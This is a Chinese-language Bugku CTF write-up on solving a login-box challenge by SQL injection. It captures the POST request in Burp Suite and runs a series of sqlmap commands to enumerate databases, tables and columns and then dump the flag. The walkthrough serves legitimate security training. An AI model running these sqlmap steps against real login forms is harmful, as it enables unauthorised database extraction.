Bugku-CTF之这是一个神奇的登陆框

Day32 

这是一个神奇的登陆框

 

flag格式flag{}
 
 
 
本题要点:sqlmap神器使用、burpsuit抓包
 
 
查看一下源码
是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。
首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)
 
 
我保存到了D:\1.txt
然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
 
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
 
可以看到sqlmap获得了数据库的名字:
 
 
应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
可以看到爆出了表:
 
 
应该在flag1这个表里,继续爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表
可以发现爆出了列名:
 
flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
 
解释:同上面 --dump是获取字段的命令
 
(在这过程中可能会让你选择Y或者N 我直接回车的)
 
可以看到爆出了flag:
 
 
 
完成!
 
最后多一句~
sqlmap是真的好用!!!!
 
 
 
 
 
 
 
 
 
 

猜你喜欢

转载自www.cnblogs.com/0yst3r-2046/p/11002420.html